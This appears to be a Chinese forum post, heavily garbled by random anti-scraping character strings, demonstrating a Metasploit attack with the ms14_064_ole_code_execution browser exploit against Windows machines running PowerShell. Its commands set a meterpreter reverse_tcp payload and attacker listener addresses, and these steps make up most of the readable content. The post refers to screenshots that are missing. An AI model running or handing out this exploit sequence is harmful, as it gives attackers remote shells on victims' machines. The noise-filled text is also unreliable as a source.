3 \& c# h. d4 T! D! X 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
8 Z( {- W& q/ \7 u6 s0 j8 j/ i
% I }3 q* s: C v5 c( b7 L( N# C2 |: \$ t
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
5 }) |8 T! e& `; a$ ]
' k! ]; W! r5 I
9 R6 b7 C! X, w* u, E6 l% ] m
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp: i% _0 o- J$ M* r& G9 I
. D+ o. t/ @+ I% o" N
* i0 J$ t6 T* g6 M1 j% s
set AllowPowershellPrompt true, u Y3 G, A1 r* F
- n7 E: Q6 Y* p! w/ u- X! x) O, Y! T' v7 R2 _4 |0 @ m: k8 H% ?7 ?8 y
Set LHOST 192.168.0.109
7 ]7 L$ @! q5 K
9 I2 h% ~0 O, C7 o, ?. e
" o/ E! `. R+ F) B( L8 K
set SRVHOST 192.168.0.109% Q/ w: Z/ z; a$ N! A, D; H( R
: t i, m! [5 n% F5 ^8 O+ T+ g* A# Z) e, y2 T' o; f$ T
Set uripath share3 j( Z5 U' \9 e$ t4 I1 x
) N0 `" |# ?# a5 }! [
% X: B5 v# L+ }! ^8 f! h7 X
Set srvport 809 k& D; R9 ~' C3 S3 E# x3 q
5 V5 X9 S/ }& {/ [5 o: c, J- s& z$ N$ X2 {1 p, r" E# s& E
6 {* W. u; n) M% \+ @/ C' c
5 a9 N3 J2 l# d- Y1 U
: ^: R. Q2 S' [9 v, _# |
4 U( Q' _0 y0 u: o( l' W8 k Q
; e( w" S) z+ S. Y9 I
4 s7 p9 @' U* H" l. S% E& u3 y/ @ z # @$ H/ Z1 Z6 S, f5 }9 a7 v/ k
: r- n" D4 T1 e, G0 k% d4 Z1 Q3 f
, o, T5 G+ j" L, a! s3 ^/ t# a; Y2 ? 9 i1 j2 z _- Y5 q7 D
i, q* m, F2 n/ D0 \4 q( D- [. e& P/ A
+ k5 K' P! b8 u Y8 y
1 e1 M7 f c! e- z2 [8 ]) K3 K8 ~8 F% s8 s) O
下面我们来访问本地地址如图:3 ?4 P% F! y) i$ U/ d
, S* L1 a- C; E' r
5 Q' m& M1 J8 T & N7 T, D: B! L& H) c% s6 f( s
/ S/ p" F% Y$ f, e' k7 {3 g
5 c+ {# Z8 N& x% n) B3 z b+ w
6 _. }; k4 x# V& N) U
- n9 Y$ }* u _% ~0 `+ R' J
7 c7 D0 G* [! a9 Y3 Q. |' c
9 O, d8 }7 i2 E